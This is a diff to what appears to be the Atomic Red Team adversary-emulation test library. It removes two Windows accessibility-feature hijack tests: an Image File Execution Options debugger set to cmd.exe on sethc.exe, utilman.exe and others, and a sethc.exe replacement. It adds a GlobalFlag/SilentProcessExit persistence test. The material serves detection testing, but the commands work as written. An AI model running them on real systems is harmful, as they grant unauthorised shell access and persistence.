-    - name: Attaches Command Prompt as a Debugger to a List of Target Processes
-      auto_generated_guid: 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9
-      description: |
-        Attaches cmd.exe to a list of processes. Configure your own Input arguments to a different executable or list of executables.
-
-        Upon successful execution, powershell will modify the registry and swap osk.exe with cmd.exe.
-      supported_platforms:
-      - windows
-      input_arguments:
-        parent_list:
-          description: 'Comma separated list of system binaries to which you want
-            to attach each #{attached_process}. Default: "osk.exe"
-
-            '
-          type: String
-          default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe,
-            atbroker.exe
-        attached_process:
-          description: 'Full path to process to attach to target in #{parent_list}.
-            Default: cmd.exe
-
-            '
-          type: Path
-          default: C:\windows\system32\cmd.exe
-      executor:
-        command: |
-          $input_table = "#{parent_list}".split(",")
-          $Name = "Debugger"
-          $Value = "#{attached_process}"
-          Foreach ($item in $input_table){
-            $item = $item.trim()
-            $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item"
-            IF(!(Test-Path $registryPath))
-            {
-              New-Item -Path $registryPath -Force
-              New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
-            }
-            ELSE
-            {
-              New-ItemProperty -Path $registryPath -Name $name -Value $Value
-            }
-          }
-        cleanup_command: |
-          $input_table = "#{parent_list}".split(",")
-          Foreach ($item in $input_table)
-          {
-            $item = $item.trim()
-            reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" /v Debugger /f 2>&1 | Out-Null
-          }
-        name: powershell
-        elevation_required: true
-    - name: Replace binary of sticky keys
-      auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3
-      description: 'Replace sticky keys binary (sethc.exe) with cmd.exe
-
-        '
-      supported_platforms:
-      - windows
-      executor:
-        command: |
-          copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe
-          takeown /F C:\Windows\System32\sethc.exe /A
-          icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t
-          copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
-        cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe
-
-          '
-        name: command_prompt
-        elevation_required: true
+    atomic_tests: []
   T1504:
     technique:
       x_mitre_platforms:

atomics/T1546.012/T1546.012.md

@@ -18,6 +18,8 @@ Malware may also use IFEO to [Impair Defenses](https://attack.mitre.org/techniqu
 
 - [Atomic Test #2 - IFEO Global Flags](#atomic-test-2---ifeo-global-flags)
 
+- [Atomic Test #3 - GlobalFlags in Image File Execution Options](#atomic-test-3---globalflags-in-image-file-execution-options)
+
 
 <br/>
 
@@ -98,4 +100,61 @@ reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #3 - GlobalFlags in Image File Execution Options
+The following Atomic Test will create a GlobalFlag key under Image File Execution Options, also a SilentProcessExit Key with ReportingMode and MonitorProcess values. This test is similar to a recent CanaryToken that will generate an EventCode 3000 in the Application log when a command, whoami.exe for example, is executed.
+Upon running Whoami.exe, a command shell will spawn and start calc.exe based on the MonitorProcess value. 
+Upon successful execution, powershell will modify the registry and spawn calc.exe. An event 3000 will generate in the Application log.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 13117939-c9b2-4a43-999e-0a543df92f0d
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| process | Process to monitor | String | whoami.exe|
+| cmd_to_run | Command to execute | String | cmd.exe /c calc.exe|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+$Name = "GlobalFlag"
+$Value = "512"
+$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{process}"
+New-Item -Path $registryPath -Force
+New-ItemProperty -Path $registryPath -Name $Name -Value $Value -PropertyType DWord -Force
+$Name = "ReportingMode"
+$Value = "1"
+$SilentProcessExit = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{process}"
+New-Item -Path $SilentProcessExit -Force
+New-ItemProperty -Path $SilentProcessExit -Name $Name -Value $Value -PropertyType DWord -Force 
+
+$Name = "MonitorProcess"
+$Value = "#{cmd_to_run}"
+New-ItemProperty -Path $SilentProcessExit -Name $Name -Value $Value -PropertyType String -Force
+Start-Process whoami.exe
+```
+
+#### Cleanup Commands:
+```powershell
+$SilentProcessExit = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{process}" 
+Remove-Item $SilentProcessExit -force
+$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{process}"
+Remove-Item $registryPath -force
+```
+
+
+
+
+
 <br/>